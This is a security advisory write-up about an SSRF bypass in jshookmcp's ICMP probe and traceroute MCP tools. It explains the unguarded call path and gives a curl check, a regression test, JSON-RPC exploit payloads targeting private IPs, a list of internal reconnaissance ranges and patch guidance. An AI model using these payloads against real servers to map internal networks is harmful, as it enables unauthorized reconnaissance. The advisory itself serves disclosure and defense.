jshookmcp, Server-Side Request Forgery (SSRF), GHSA-c5r6-m4mr-8q5j (Medium) -DC-Jul2026-781


How the CVE Works

The jshookmcp network domain implements a centralized SSRF authorization policy designed to block access to private, loopback, link-local, and reserved IP addresses. This policy is enforced for raw HTTP, TCP, and TLS RTT tools through the `resolveAuthorizedTransportTarget` function, which checks the target against the policy and requires explicit authorization for private network access.
However, the `network_icmp_probe` and `network_traceroute` tools bypass this control entirely. Instead of going through the authorized resolver, they call `resolveHostname()`, a helper that returns IPv4 literals as-is and performs a DNS A lookup with no validation against private, loopback, link-local, or reserved ranges.
An MCP client with access to an active network domain can therefore invoke `network_icmp_probe` or `network_traceroute` with an internal address such as 10.0.0.1. The server resolves the target and passes it directly to the native ICMP probe or traceroute sink, completely bypassing the SSRF authorization guard that would normally block the request.

The vulnerable call sequence is:

call_tool(name=network_icmp_probe, args={target: 10.0.0.1, ttl: 64})
-> ctx.router.has(network_icmp_probe) == true
-> ctx.executeToolWithTracking(network_icmp_probe, validatedArgs)
-> RawHandlers.handleNetworkIcmpProbe(validatedArgs)
-> resolveHostname(10.0.0.1) returns 10.0.0.1
-> icmpProbe({ target: 10.0.0.1, ttl: 64, ... })

`resolveAuthorizedTransportTarget` is not called anywhere on this path. The same missing-policy pattern exists for `network_traceroute`.
This effectively turns the jshookmcp server into an internal network probing oracle, exposing reachability, latency measurements, traceroute hops, and ICMP error classes from the server’s network position, all without any authorization.
The vulnerability affects `@jshookmcp/jshook` version `0.3.1` and the main branch at commit d309c39. It was patched in version `0.3.2` with the introduction of `resolveAuthorizedHostTarget()`, a policy-aware resolver that blocks private IP ranges by default.

DailyCVE Form

Platform: ……. jshookmcp
Version: …….. 0.3.1
Vulnerability :…… SSRF Bypass (ICMP/Traceroute)
Severity: ……. Medium (CVSS 3.1: 4.3)
Date: ………. 2026-05-02

Prediction: …… 2026-05-27 (patched in 0.3.2)

What Undercode Say: Analytics

SSRF Policy Bypass Detection

To verify whether a jshookmcp instance is vulnerable, test the ICMP probe against a private address:

# Test ICMP probe against a private IP (vulnerable if the call returns success)
curl -X POST http://localhost:3000/mcp \
  -H "Content-Type: application/json" \
  -d '{
    "jsonrpc": "2.0",
    "method": "call_tool",
    "params": {
      "name": "network_icmp_probe",
      "arguments": {
        "target": "10.0.0.1",
        "ttl": 64
      }
    },
    "id": 1
  }'

Regression Test (from the security advisory)

The following test proves the bypass exists:

import { it, expect, vi } from 'vitest';
// RawHandlers, handleCallTool and the `state` holder for the mocked
// resolveAuthorizedTransportTarget / icmpProbe spies come from the suite's own
// setup, which is not reproduced on this page.

it('bypass proof: call_tool can drive network_icmp_probe to a private IP without the SSRF authorization guard', async () => {
  const raw = new RawHandlers();
  const ctx = {
    router: {
      has: vi.fn((name: string) => name === 'network_icmp_probe')
    },
    executeToolWithTracking: vi.fn((name: string, args: Record<string, unknown>) =>
      raw.handleNetworkIcmpProbe(args)
    ),
  } as any;
  const response = await handleCallTool(ctx, {
    name: 'network_icmp_probe',
    args: { target: '10.0.0.1', ttl: 64 }
  });
  const body = JSON.parse(response.content[0].text);
  expect(body.success).toBe(true);
  // The SSRF guard is never consulted on this path ...
  expect(state.resolveAuthorizedTransportTarget).not.toHaveBeenCalled();
  // ... and the private literal reaches the native ICMP sink unchanged.
  expect(state.icmpProbe).toHaveBeenCalledWith(expect.objectContaining({
    target: '10.0.0.1',
    ttl: 64
  }));
});

Run the test suite:

corepack pnpm exec vitest run --config vitest.config.ts \
tests/server/security/jshookmcp-network-meta-boundary.test.ts \
--reporter=verbose

Affected Code Locations:

| File | Lines | Function | Issue |
|---|---|---|---|
| `raw-latency-handlers.ts` | 123-139 | `network_traceroute` | Calls `resolveHostname()` without policy check |
| `raw-latency-handlers.ts` | 240-257 | `network_icmp_probe` | Calls `resolveHostname()` without policy check |
| `raw-latency-handlers.ts` | 408-416 | `resolveHostname()` | Returns IPv4 literals directly, no range validation |
| `ssrf-policy.ts` | 244-316 | Central policy | Blocks private targets unless authorized |

Exploit

An attacker with MCP client access to an active network domain can exploit this vulnerability by invoking the `network_icmp_probe` or `network_traceroute` tools with internal IP addresses.

Example exploit payloads:

{
  "method": "call_tool",
  "params": {
    "name": "network_icmp_probe",
    "arguments": {
      "target": "10.0.0.1",
      "ttl": 64
    }
  }
}

{
  "method": "call_tool",
  "params": {
    "name": "network_traceroute",
    "arguments": {
      "target": "192.168.1.1"
    }
  }
}

Internal network reconnaissance targets:

– `10.0.0.0/8` – RFC 1918 private network
– `172.16.0.0/12` – RFC 1918 private network
– `192.168.0.0/16` – RFC 1918 private network
– `127.0.0.0/8` – Loopback
– `169.254.0.0/16` – Link-local

The server responds with ICMP echo results, latency measurements, TTL values, and traceroute hop information, effectively acting as an internal network mapping oracle from the server’s network position.

Impact scenarios:

  • Remote transport exposure: when jshookmcp is exposed over Streamable HTTP or another remote transport
  • Multi-tenant environments: multiple clients sharing one server
  • Windows or raw socket capability: enhanced probe capabilities

This is not code execution and does not by itself exfiltrate response bodies; it is a reconnaissance primitive.

Protection

1. Upgrade to patched version

The vulnerability is fixed in `@jshookmcp/jshook` version `0.3.2`:

npm install @jshookmcp/jshook@0.3.2

2. Verify the fix

The patch introduces `resolveAuthorizedHostTarget()` in raw-helpers—a host-only SSRF guard that replaces `resolveHostname()` in both vulnerable handlers. The fix also adds 10 regression tests covering private IP blocks, DNS-to-private resolution, and loopback addresses.

3. Do not rely on environment configuration

Because the vulnerable handlers never consult the SSRF policy, no policy setting mitigates them on 0.3.1; only the upgrade does. Note also that the following variable explicitly allows local SSRF and weakens security; it should stay unset in production even after upgrading unless private-network probing is intended:

ALLOW_LOCAL_SSRF=true

4. Network-level protection

  • Restrict access to the jshookmcp server to trusted clients only
  • Use firewall rules to limit outbound ICMP and traceroute from the server
  • Monitor for unusual `network_icmp_probe` or `network_traceroute` calls in logs

5. Remediation checklist (from the security advisory):

  • [ ] Apply the same authorization model used by `network_rtt_measure` and `network_latency_stats` to `network_icmp_probe` and `network_traceroute`
    – [ ] Accept an optional `authorization` object in both handlers
  • [ ] Resolve targets through the central policy helper or an equivalent host-only policy helper
  • [ ] Block private and reserved ranges by default
  • [ ] Pass only the policy-approved resolved address to the native probe
  • [ ] Add regression tests for default-denied private targets, authorized private CIDR access, private hostnames, and `call_tool` dispatch

Impact

| Aspect | Details |
|---|---|
| Attack Vector | Network (MCP client → jshookmcp server) |
| Attack Complexity | Low |
| Privileges Required | Access to active network domain |
| User Interaction | None |
| Confidentiality Impact | Low (internal network topology disclosure) |
| Integrity Impact | None |
| Availability Impact | None |
| Scope | Unchanged |
| CVSS Base Score | 4.3 (Medium) |

Practical impact is strongest when:

  • jshookmcp is exposed over Streamable HTTP or another remote transport
  • Multiple clients share one server
  • The server runs on Windows or with raw socket capability

What an attacker can learn:

  • Whether internal hosts are reachable from the server
  • Approximate latency to internal hosts
  • Traceroute hop counts and paths
  • ICMP error classes (host unreachable, port unreachable, TTL exceeded, etc.)
  • Internal network topology and routing information

What an attacker cannot do:

  • Execute arbitrary code
  • Exfiltrate HTTP response bodies
  • Modify internal systems
  • Escalate privileges within the application


Sources:

Reported By: github.com